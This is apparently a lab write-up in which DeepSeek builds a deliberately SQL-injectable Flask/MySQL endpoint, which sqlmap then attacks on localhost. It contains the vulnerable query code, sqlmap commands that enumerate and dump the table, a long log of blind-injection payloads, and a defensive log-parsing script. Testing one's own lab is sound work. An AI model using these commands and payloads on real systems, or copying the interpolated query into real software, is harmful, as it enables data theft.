Cybersecurity: using DeepSeek to obtain sqlmap attack payloads

Overview

Today I'm using DeepSeek for a security test, to see how quickly it can implement something when I already have a plan in mind.

Using DeepSeek

I have a plan: I want to test how the sqlmap tool dumps a database:

Connect to a MySQL database, create a test database and table (the table must contain at least integer and string columns), and insert sample data

Write an API with Python Flask that queries the database and returns the contents

Attack that API with sqlmap

Check the API logs

Please optimize my approach and provide the relevant code

Create the sample database

```sql
-- Create the test database
CREATE DATABASE sqlmap_test;

-- Create a table with several data types
USE sqlmap_test;
CREATE TABLE users (
    id INT PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(50),
    email VARCHAR(100),
    age INT,
    created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
    profile TEXT,
    is_admin BOOLEAN DEFAULT FALSE
);

-- Insert test data
INSERT INTO users (username, email, age, profile, is_admin) VALUES
('admin', 'admin@example.com', 30, 'System Administrator', TRUE),
('user1', 'user1@test.com', 25, 'Regular user profile', FALSE),
('test_user', 'test@domain.com', 28, 'Another test user', FALSE);
```

Create the API

```python
# app.py
import json
from flask import Flask, request, jsonify
import pymysql
from datetime import datetime
import logging
from logging.handlers import RotatingFileHandler
from setting import *  # local setting.py supplies DB_HOST, DB_USER, DB_PASSWORD, DB_NAME, DB_PORT

app = Flask(__name__)

# Database connection settings
db_config = {
    "host": DB_HOST,
    "user": DB_USER,
    "password": DB_PASSWORD,
    "db": DB_NAME,
    "port": DB_PORT,
    "charset": "utf8mb4",
    "cursorclass": pymysql.cursors.DictCursor
}


# Logging setup
def setup_logger():
    # Remove Flask's default handlers
    app.logger.handlers.clear()

    # Shared log format
    formatter = logging.Formatter(
        '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'
    )

    # Access log
    access_handler = RotatingFileHandler(
        'access.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True  # defer opening the file until the first write
    )
    access_handler.setFormatter(formatter)
    access_handler.setLevel(logging.INFO)
    app.logger.addHandler(access_handler)
    app.logger.setLevel(logging.INFO)

    # SQL log (separate logger)
    sql_handler = RotatingFileHandler(
        'sql.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True
    )
    sql_handler.setFormatter(formatter)
    sql_handler.setLevel(logging.INFO)

    sql_logger = logging.getLogger('sql')
    sql_logger.propagate = False  # do not propagate to the root logger
    sql_logger.setLevel(logging.INFO)
    sql_logger.addHandler(sql_handler)


# Configure logging once the app object exists
setup_logger()


def get_db_connection():
    return pymysql.connect(**db_config)


@app.route('/users', methods=['GET'])
def get_users():
    search = request.args.get('search', '')
    # Write the access log entry and flush it immediately
    app.logger.info(f"Access: {request.method} {request.path} - Params: {dict(request.args)}")
    app.logger.handlers[0].flush()
    conn = get_db_connection()
    try:
        with conn.cursor() as cursor:
            # Deliberately vulnerable query: the parameter is interpolated straight into the SQL string
            query = f"SELECT * FROM users WHERE username = '{search}'"

            # Log the SQL and flush immediately
            sql_logger = logging.getLogger('sql')
            sql_logger.info(f"EXECUTE SQL: {query}")
            sql_logger.handlers[0].flush()

            cursor.execute(query)
            results = cursor.fetchall()

        # Convert datetime values to strings
        for row in results:
            if 'created_at' in row and isinstance(row['created_at'], datetime):
                row['created_at'] = row['created_at'].isoformat()
        app.logger.info(json.dumps(results))  # no exc_info here: there is no exception to attach
        return jsonify(results)
    except pymysql.Error as e:
        # Log the full error
        error_msg = f"Database error ({e.args[0]}): {e.args[1]}"
        app.logger.error(error_msg, exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Database error"})
    except Exception as e:
        app.logger.error(f"Unexpected error: {str(e)}", exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Server error"})
    finally:
        conn.close()  # conn is always bound by the time we reach the try block


if __name__ == '__main__':
    # Disable the reloader to avoid duplicate log lines
    app.run(host='0.0.0.0', port=5000, debug=False, use_reloader=False)
```

After it is running, visit:

```
http://127.0.0.1:5000/users?search=test_user
```

The result is as follows:

Testing sqlmap

```bash
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 --dbs --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test --tables --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users --columns --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users -C id,username,is_admin --dump --dump-format csv --batch
```




Overall, it was implemented pretty quickly; only the logging and the response codes in the API implementation needed slight tweaking.

PS: I was only testing DeepSeek, so why did sqlmap still go wrong? What's with the two test_user entries...

Partial logs

```
[2025-03-01 21:55:51,918] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,058] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>54 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,139] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>52 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,258] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>53 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,343] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,600] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>48 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,682] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>9 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,814] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,819] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,829] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,898] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,167] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,197] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,266] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,284] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,318] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,372] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,406] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,408] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>106 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,576] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,670] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>97 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,724] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>109 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,738] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>99 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,739] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,740] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>105 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,838] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>109 AND 'FFDM'='FFDM'
```
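Every line in that log has the same shape: the literal the endpoint expected (`username = 'test_user'`) followed by an injected `ORD(MID((subquery),pos,1))>N` comparison whose threshold N moves by binary search, one character position at a time, and a closing tautology (`'FFDM'='FFDM'`) that keeps the statement syntactically valid. Reading that structure back out of sql.log is the defender's side of this exercise. The following is an added example, not code from the post, from DeepSeek or from sqlmap: it parses lines in the app's log format, separates benign queries from blind-injection probes and other tampering, and groups the thresholds per subquery and character position; the five log lines it runs on are constructed to match the format above.

```python
import re

# Constructed sample lines in the format of the app's sql.log (not copied from the post's log).
SAMPLE_LOG = [
    "[2025-03-01 21:55:50,001] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user'",
    "[2025-03-01 21:55:51,918] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>64 AND 'FFDM'='FFDM'",
    "[2025-03-01 21:55:52,100] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>96 AND 'FFDM'='FFDM'",
    "[2025-03-01 21:55:52,200] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>112 AND 'FFDM'='FFDM'",
    "[2025-03-01 21:55:53,000] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'x' OR 1=1 -- '",
]
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \w+ in \w+: EXECUTE SQL: (?P<sql>.*)$")
# The only query shape the endpoint should ever produce: one quoted literal and nothing after it.
BENIGN_RE = re.compile(r"^SELECT \* FROM users WHERE username = '[^']*'$")
# Boolean-blind probe as it appears in the log: ORD(MID((subquery),pos,1))>threshold
PROBE_RE = re.compile(r"ORD\(MID\(\((?P<sub>SELECT .*?)\),(?P<pos>\d+),1\)\)>(?P<thr>\d+)")

def parse_line(line):
    """Split one log line into (timestamp, sql); None for lines that are not SQL records."""
    m = LINE_RE.match(line)
    return (m.group("ts"), m.group("sql")) if m else None

def classify(sql):
    """'benign' for the expected shape, 'probe' for a blind comparison, 'injected' otherwise.
    A real value with a quote (O'Brien) also lands in 'injected': with string interpolation it is a syntax error anyway."""
    if BENIGN_RE.match(sql):
        return "benign"
    return "probe" if PROBE_RE.search(sql) else "injected"

def probe_details(sql):
    """Which subquery and character position a probe tests, and against what ORD threshold."""
    m = PROBE_RE.search(sql)
    return None if m is None else {"subquery": m.group("sub"), "pos": int(m.group("pos")), "threshold": int(m.group("thr"))}

def analyse(lines):
    """Count each class and collect thresholds per (subquery, position): the successive
    thresholds for one position are sqlmap's binary search for that single character."""
    counts = {"benign": 0, "probe": 0, "injected": 0}
    search = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        kind = classify(parsed[1])
        counts[kind] += 1
        if kind == "probe":
            d = probe_details(parsed[1])
            search.setdefault((d["subquery"], d["pos"]), []).append(d["threshold"])
    return counts, search
```

On the constructed sample, `analyse(SAMPLE_LOG)` reports one benign query, three probes and one other injected query, with thresholds 64, 96, 112 recorded for character position 1 of the username subquery; a single non-benign line in this log is already worth an alert, since the endpoint can never legitimately produce one.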

References

腾讯元宝
sqlmap
